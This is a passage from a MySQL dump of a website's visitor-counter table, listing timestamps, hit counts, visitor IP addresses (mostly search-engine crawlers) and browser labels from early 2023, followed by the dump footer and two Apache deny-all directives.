66.249.70.41','chrome'),(567760,1675423013,1,0,1,0,'66.249.70.37',''),(567761,1675424582,1,1,0,0,'178.133.5.181','chrome'),(567762,1675424764,1,1,0,0,'31.13.127.18','other'),(567764,1675424765,1,1,0,0,'31.13.127.19','other'),(567765,1675424772,1,1,0,0,'31.13.127.20','other'),(567766,1675427481,1,0,1,0,'66.249.70.41',''),(567767,1675434918,1,1,0,0,'77.88.5.219','other'),(567768,1675435791,1,0,1,0,'66.249.70.41',''),(567769,1675438087,10,10,0,0,'209.126.77.66','chrome'),(567770,1675454077,1,1,0,0,'66.249.70.41','chrome'),(567771,1675455678,1,1,0,0,'95.79.174.237','chrome'),(567772,1675457628,1,1,0,0,'66.249.70.37','chrome'),(567773,1675458415,1,1,0,0,'66.249.70.41','chrome'),(567774,1675458692,1,1,0,0,'87.236.176.158','other'),(567775,1675458694,1,1,0,0,'104.248.204.195','chrome'),(567776,1675458943,1,0,1,0,'66.249.70.39',''),(567777,1675459349,1,1,0,0,'93.158.161.76','other'),(567778,1675460702,1,1,0,0,'66.249.70.37','chrome'),(567779,1675461780,1,1,0,0,'66.249.70.41','chrome'),(567780,1675463307,2,2,0,0,'66.249.70.37','chrome'),(567781,1675464985,1,1,0,0,'5.161.189.9','chrome'),(567782,1675465172,1,1,0,0,'108.174.5.113','other'),(567783,1675465878,1,1,0,0,'77.88.5.219','other'),(567784,1675466013,1,1,0,0,'93.158.161.76','other'),(567785,1675466955,1,0,1,0,'66.249.70.37',''),(567786,1675468446,1,0,1,0,'66.249.70.37',''),(567787,1675471339,1,0,1,0,'66.249.70.37',''),(567788,1675475826,1,1,0,0,'66.249.70.41','chrome'),(567789,1675476592,1,1,0,0,'66.249.70.37','chrome'),(567790,1675480695,1,1,0,0,'198.22.162.110','chrome'),(567791,1675481646,1,1,0,0,'198.22.162.110','chrome'),(567792,1675482576,1,1,0,0,'198.22.162.110','chrome'),(567793,1675483505,1,1,0,0,'198.22.162.110','chrome'),(567794,1675484227,1,1,0,0,'66.249.70.37','chrome'),(567795,1675484462,1,1,0,0,'198.22.162.110','chrome'),(567796,1675485408,1,1,0,0,'198.22.162.110','chrome'),(567797,1675485605,1,1,0,0,'66.249.70.37','chrome'),(567798,1675486352,1,1,0,0,'198.22.162.110','chrome'),(567799,1675486842,1,1,0,0,'66.249.70.37','chrome'),(567800,1675487280,1,1,0,0,'198.22.162.110','chrome'),(567801,1675487452,1,1,0,0,'66.249.70.41','chrome'),(567802,1675488191,1,1,0,0,'198.22.162.110','chrome'),(567803,1675489101,1,1,0,0,'198.22.162.110','chrome'),(567804,1675508698,1,0,1,0,'66.249.70.41',''),(567805,1675510662,1,1,0,0,'77.88.5.219','other'),(567806,1675523785,1,1,0,0,'5.161.189.6','chrome'),(567807,1675526727,1,1,0,0,'31.13.127.2','other'),(567808,1675530251,1,1,0,0,'52.167.144.90','chrome'),(567809,1675537174,1,1,0,0,'77.88.5.38','chrome'),(567810,1675544647,1,0,1,0,'66.249.70.37',''),(567811,1675544917,2,2,0,0,'74.84.150.150','other'),(567812,1675552819,1,1,0,0,'194.38.20.161','other'),(567813,1675571160,7,7,0,0,'77.88.5.219','other'),(567814,1675571300,3,3,0,0,'77.88.5.219','chrome'),(567815,1675571342,5,5,0,0,'93.158.161.76','other'),(567816,1675577730,2,1,1,0,'66.249.70.39',''),(567817,1675580434,1,1,0,0,'77.88.5.219','chrome'),(567818,1675582670,1,1,0,0,'5.161.189.8','chrome'),(567819,1675593793,1,0,1,0,'66.249.70.39',''),(567820,1675613324,1,1,0,0,'198.235.24.128','other'),(567821,1675629501,1,0,1,0,'66.249.70.39',''),(567822,1675637989,1,1,0,0,'80.94.92.34','chrome'),(567823,1675637991,1,1,0,0,'80.94.92.34','other'),(567824,1675645835,1,1,0,0,'77.88.5.219','chrome'),(567825,1675652338,1,1,0,0,'185.195.25.207','firefox'),(567826,1675652573,3,3,0,0,'147.78.47.249','chrome'),(567827,1675654222,1,1,0,0,'77.88.5.219','chrome'),(567828,1675665403,1,1,0,0,'77.88.5.219','other'),(567829,1675667222,1,1,0,0,'77.88.5.219','other'),(567830,1675667265,1,1,0,0,'93.158.161.76','chrome'),(567831,1675667297,1,1,0,0,'77.88.5.219','chrome'),(567832,1675671085,1,1,0,0,'5.161.189.8','chrome'),(567833,1675675710,1,1,0,0,'35.92.102.123','chrome'),(567834,1675675711,1,1,0,0,'54.212.101.100','chrome'),(567835,1675676000,2,2,0,0,'18.246.61.47','chrome'),(567836,1675680302,1,0,1,0,'66.249.70.39',''),(567837,1675683097,1,1,0,0,'159.138.102.98','other'),(567838,1675693481,1,1,0,0,'91.196.178.48','chrome'),(567839,1675695960,1,1,0,0,'174.138.24.179','chrome'),(567840,1675700643,1,1,0,0,'5.161.189.8','chrome'),(567841,1675706698,1,1,0,0,'137.116.141.77','firefox'),(567842,1675708726,1,1,0,0,'52.167.144.90','chrome'),(567843,1675714720,1,0,1,0,'66.249.70.41',''),(567844,1675715012,1,1,0,0,'87.236.176.249','other'),(567845,1675715019,1,1,0,0,'209.97.152.248','chrome'),(567846,1675719123,1,1,0,0,'93.158.161.76','chrome'),(567847,1675730128,1,1,0,0,'5.161.189.7','chrome'),(567848,1675734147,1,1,0,0,'52.167.144.90','chrome'),(567849,1675738127,1,0,1,0,'66.249.70.39',''),(567850,1675738177,1,1,0,0,'66.249.70.39','chrome'),(567851,1675746266,1,1,0,0,'180.211.97.53','firefox'),(567852,1675750565,1,1,0,0,'5.161.69.6','chrome'),(567853,1675751203,2,2,0,0,'79.124.59.150','chrome'),(567854,1675754322,1,1,0,0,'165.227.85.124','chrome'),(567855,1675764893,1,1,0,0,'194.38.20.161','other'),(567856,1675766442,1,0,1,0,'66.249.70.37',''),(567857,1675789740,1,1,0,0,'54.216.30.235','other'),(567858,1675789900,1,1,0,0,'34.249.52.141','other'),(567859,1675800558,1,0,1,0,'66.249.66.32',''),(567860,1675831613,1,0,1,0,'66.249.66.42',''),(567861,1675832317,1,1,0,0,'66.249.66.42','chrome'),(567862,1675840723,1,1,0,0,'66.249.66.44','chrome'),(567863,1675850564,1,1,0,0,'35.89.108.22','chrome'),(567864,1675850571,1,1,0,0,'34.215.241.168','chrome'),(567865,1675850585,1,1,0,0,'35.88.56.245','chrome'),(567866,1675850620,2,2,0,0,'35.87.188.172','chrome'),(567867,1675853055,1,0,1,0,'66.249.66.42',''),(567868,1675865995,2,0,2,0,'66.249.70.39',''),(567869,1675868325,1,1,0,0,'66.249.70.39','chrome'),(567870,1675874477,1,1,0,0,'66.249.64.105','chrome'),(567871,1675884299,1,1,0,0,'128.199.73.71','chrome'),(567872,1675887186,1,0,1,0,'66.249.70.37',''),(567873,1675888738,1,1,0,0,'66.249.70.39','chrome'),(567874,1675894922,1,1,0,0,'66.249.70.39','chrome'),(567875,1675895587,1,1,0,0,'77.88.5.83','other'),(567876,1675895589,1,1,0,0,'77.88.5.22','other'),(567877,1675896772,2,2,0,0,'79.124.59.150','chrome'),(567878,1675901363,1,0,1,0,'66.249.70.39',''),(567879,1675912558,1,1,0,0,'77.88.5.157','chrome'),(567880,1675922782,1,1,0,0,'77.88.5.174','other'),(567881,1675922785,1,1,0,0,'93.158.161.54','other'),(567882,1675922789,2,2,0,0,'77.88.5.219','other'),(567883,1675932021,1,1,0,0,'15.204.173.67','chrome'),(567884,1675932023,1,1,0,0,'15.204.173.67','other'),(567885,1675932028,1,1,0,0,'51.81.167.146','other'),(567887,1675932029,1,1,0,0,'51.75.169.50','other'),(567888,1675932037,1,1,0,0,'3.124.247.187','chrome'),(567889,1675932097,15,15,0,0,'170.187.164.225','other'),(567890,1675932099,15,15,0,0,'164.92.189.255','other'),(567891,1675932101,1,1,0,0,'164.92.189.255','chrome'),(567892,1675932102,1,1,0,0,'170.187.164.225','chrome'),(567893,1675932131,1,1,0,0,'39.110.218.101','other'),(567894,1675932526,1,1,0,0,'128.90.172.168','chrome'),(567895,1675932527,1,1,0,0,'161.35.246.138','other'),(567899,1675933819,2,2,0,0,'51.75.169.50','other'),(567900,1675939250,1,1,0,0,'133.242.174.119','other'),(567901,1675939255,1,1,0,0,'133.242.140.127','other'),(567902,1675939438,1,0,1,0,'66.249.70.37',''),(567903,1675939635,1,1,0,0,'77.88.5.219','other'),(567904,1675940153,1,1,0,0,'205.169.39.63','chrome'),(567905,1675940319,1,0,1,0,'66.249.70.41',''),(567907,1675942884,1,1,0,0,'66.249.70.41','chrome'),(567908,1675944077,1,1,0,0,'66.249.70.37','chrome'),(567909,1675955288,1,1,0,0,'66.249.66.42','chrome'),(567910,1675955330,1,1,0,0,'66.249.66.158','chrome'),(567911,1675955629,1,1,0,0,'66.249.66.76','chrome'),(567912,1675957351,1,1,0,0,'66.249.66.211','chrome'),(567913,1675961186,1,0,1,0,'66.249.66.207',''),(567914,1675962157,1,0,1,0,'66.249.66.207',''),(567915,1675962290,1,0,1,0,'66.249.66.76',''),(567916,1675963179,1,1,0,0,'66.249.66.158','chrome'),(567917,1675964804,1,1,0,0,'31.13.127.16','other'),(567918,1675964811,1,1,0,0,'31.13.127.21','other'),(567919,1675964881,1,0,1,0,'66.249.66.77',''),(567920,1675968107,1,1,0,0,'190.107.177.243','firefox'),(567921,1675970602,1,1,0,0,'69.171.249.10','other'),(567922,1675973406,1,0,1,0,'66.249.66.159',''),(567923,1675974611,1,0,1,0,'66.249.66.42',''),(567924,1675975362,3,3,0,0,'47.254.74.59','chrome'),(567925,1675975363,1,1,0,0,'47.251.15.21','chrome'),(567926,1675975365,2,2,0,0,'47.251.14.232','chrome'),(567927,1675975366,1,1,0,0,'47.88.87.97','chrome'),(567928,1675975367,1,1,0,0,'47.88.101.3','chrome'),(567929,1675975368,1,1,0,0,'47.251.13.32','chrome'),(567930,1675975372,1,1,0,0,'47.88.90.156','chrome'),(567931,1675975376,2,2,0,0,'47.251.11.3','chrome'),(567932,1675976759,1,1,0,0,'31.13.103.9','other'),(567933,1675984796,2,2,0,0,'45.90.63.24','chrome'),(567934,1675984907,1,0,1,0,'66.249.66.43',''),(567935,1675987785,2,2,0,0,'45.90.61.249','chrome'),(567936,1676005034,1,1,0,0,'66.249.66.77','chrome'),(567937,1676005270,1,1,0,0,'66.249.66.3','chrome'),(567938,1676018682,1,1,0,0,'52.167.144.90','chrome'),(567939,1676018736,4,4,0,0,'34.172.144.130','chrome'),(567940,1676025356,1,0,1,0,'66.249.66.42',''),(567941,1676026858,1,1,0,0,'66.249.66.43','chrome'),(567942,1676039413,1,1,0,0,'194.38.20.161','other'),(567943,1676049359,1,1,0,0,'165.22.58.178','firefox'),(567944,1676052184,1,0,1,0,'66.249.70.37',''),(567945,1676053200,1,1,0,0,'31.13.127.119','other'),(567946,1676053201,1,1,0,0,'31.13.127.29','other'),(567947,1676053966,1,1,0,0,'95.79.200.97','chrome'),(567948,1676055791,1,1,0,0,'198.235.24.2','other'),(567949,1676060215,1,0,1,0,'66.249.70.39',''),(567950,1676066280,1,1,0,0,'31.13.127.15','other'),(567951,1676071086,2,2,0,0,'89.104.101.214','chrome'),(567952,1676071142,1,1,0,0,'185.181.60.39','chrome'),(567953,1676074100,1,1,0,0,'176.53.222.33','chrome'),(567954,1676074105,2,2,0,0,'176.53.222.210','chrome'),(567955,1676075992,1,1,0,0,'212.102.33.66','chrome'),(567956,1676088627,1,1,0,0,'159.65.9.34','chrome'),(567957,1676096083,1,1,0,0,'51.255.62.15','firefox'),(567958,1676096085,1,1,0,0,'51.255.62.6','firefox'),(567959,1676097986,1,1,0,0,'188.165.87.102','firefox'),(567960,1676098615,1,1,0,0,'51.254.49.107','firefox'),(567961,1676109083,1,1,0,0,'114.119.157.37','other'),(567962,1676111723,1,0,1,0,'66.249.70.37',''),(567963,1676117372,1,1,0,0,'66.249.70.37','chrome'),(567964,1676123876,1,1,0,0,'205.210.31.167','other'),(567965,1676146139,1,0,1,0,'66.249.70.41',''),(567966,1676153353,1,1,0,0,'66.249.70.37','chrome'),(567967,1676157137,2,2,0,0,'74.84.150.150','other'),(567968,1676160283,1,1,0,0,'45.90.62.136','chrome'),(567969,1676160288,1,1,0,0,'45.90.61.248','chrome'),(567970,1676161656,1,1,0,0,'194.38.20.161','other'),(567971,1676163940,2,2,0,0,'89.104.110.204','chrome'),(567972,1676195963,2,2,0,0,'20.122.172.98','firefox'),(567973,1676198252,1,0,1,0,'66.249.70.39',''),(567974,1676203170,1,1,0,0,'143.198.199.194','chrome'),(567975,1676205285,1,1,0,0,'20.246.83.159','other'),(567976,1676211057,1,1,0,0,'142.4.22.16','firefox'),(567977,1676228545,1,1,0,0,'69.63.184.120','other'),(567978,1676232745,1,0,1,0,'66.249.70.39',''),(567979,1676246483,1,1,0,0,'172.176.101.21','other'),(567980,1676249485,1,1,0,0,'66.249.70.39','chrome'),(567981,1676255487,2,2,0,0,'20.122.172.98','firefox'),(567982,1676255814,1,1,0,0,'199.19.72.233','chrome'),(567983,1676271816,1,1,0,0,'52.167.144.90','chrome'),(567984,1676280795,1,1,0,0,'185.39.144.147','other'),(567985,1676281808,1,1,0,0,'52.41.43.113','chrome'),(567986,1676281810,1,1,0,0,'54.69.62.126','chrome'),(567987,1676281827,1,1,0,0,'34.213.13.182','chrome'),(567988,1676284600,1,0,1,0,'66.249.70.39',''),(567989,1676291828,1,1,0,0,'194.38.20.161','other'),(567990,1676308348,1,0,1,0,'66.249.66.4',''),(567991,1676314798,1,1,0,0,'87.236.176.232','other'),(567992,1676318751,1,0,1,0,'66.249.66.76',''),(567993,1676321609,1,1,0,0,'93.158.161.76','chrome'),(567994,1676343334,1,1,0,0,'34.243.15.23','other'),(567995,1676345045,1,0,1,0,'66.249.66.158',''),(567996,1676366175,1,1,0,0,'77.88.5.219','chrome'),(567997,1676369170,1,1,0,0,'207.241.235.249','other'),(567998,1676371240,1,1,0,0,'176.213.6.146','firefox'),(567999,1676371393,1,1,0,0,'88.155.108.59','chrome'),(568000,1676391798,1,1,0,0,'123.6.49.38','other'),(568001,1676391951,1,1,0,0,'123.6.49.4','other'),(568002,1676392370,1,1,0,0,'123.6.49.6','other'),(568003,1676393463,1,1,0,0,'101.198.0.189','chrome'),(568004,1676393624,1,1,0,0,'101.198.0.180','other'),(568005,1676393891,3,3,0,0,'101.198.0.157','other'),(568006,1676394064,1,1,0,0,'101.198.0.187','other'),(568007,1676395102,1,1,0,0,'178.128.82.148','firefox'),(568008,1676397745,1,1,0,0,'198.235.24.170','other'),(568009,1676405321,1,0,1,0,'66.249.70.37',''),(568010,1676407835,1,1,0,0,'31.13.103.8','other'),(568011,1676407836,1,1,0,0,'31.13.103.11','other'),(568012,1676407837,1,1,0,0,'31.13.103.17','other'),(568013,1676407864,1,1,0,0,'31.13.103.5','other'),(568014,1676407877,1,1,0,0,'31.13.103.2','other'),(568015,1676423058,1,1,0,0,'194.38.20.161','other'),(568016,1676427850,1,0,1,0,'87.245.222.4',''),(568017,1676427854,1,0,1,0,'66.249.70.37',''),(568018,1676428889,5,5,0,0,'3.145.126.129','chrome'),(568019,1676429599,1,1,0,0,'20.246.83.159','other'),(568020,1676434447,1,1,0,0,'95.108.213.134','chrome'),(568021,1676444328,1,1,0,0,'213.180.203.165','other'),(568022,1676452506,1,1,0,0,'112.51.200.242','other'),(568023,1676456543,1,0,1,0,'66.249.70.39',''),(568024,1676474726,1,1,0,0,'34.249.201.251','other'),(568025,1676479059,1,1,0,0,'35.225.94.95','firefox'),(568026,1676479117,1,1,0,0,'120.230.111.83','chrome'),(568027,1676483632,5,5,0,0,'204.48.23.215','chrome'),(568028,1676490642,1,0,1,0,'66.249.70.37',''),(568029,1676491979,1,0,1,0,'66.249.70.37',''),(568030,1676514207,1,1,0,0,'213.180.203.207','other'),(568031,1676521554,1,0,1,0,'66.249.70.39',''),(568032,1676527430,35,35,0,0,'20.198.102.117','other'),(568033,1676528543,1,1,0,0,'52.167.144.90','chrome'),(568034,1676529156,1,0,1,0,'217.20.185.196',''),(568035,1676529158,1,0,1,0,'66.249.70.41',''),(568036,1676533472,1,1,0,0,'87.250.224.206','other'),(568037,1676536487,2,1,1,0,'66.249.70.55',''),(568038,1676539316,1,1,0,0,'87.250.224.206','chrome'),(568039,1676542906,1,0,1,0,'66.249.70.59',''),(568040,1676549948,1,1,0,0,'194.38.20.161','other'),(568041,1676554627,1,1,0,0,'95.108.213.155','other'),(568042,1676554780,1,1,0,0,'46.133.4.251','chrome'),(568043,1676563292,1,1,0,0,'87.250.224.41','other'),(568044,1676565679,1,1,0,0,'95.79.132.197','chrome'),(568045,1676567168,1,1,0,0,'208.76.80.51','firefox'),(568046,1676572267,1,1,0,0,'91.196.178.199','chrome'),(568047,1676574931,1,1,0,0,'91.196.178.222','chrome'),(568048,1676577039,1,0,1,0,'66.249.70.37',''),(568049,1676580660,1,1,0,0,'103.130.219.2','firefox'),(568050,1676585946,2,2,0,0,'87.250.224.41','other');
/*!40000 ALTER TABLE `fw3gt_zt_visitor_counter` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-02-17  2:24:12

Order allow,deny Deny from all Order allow,deny Deny from all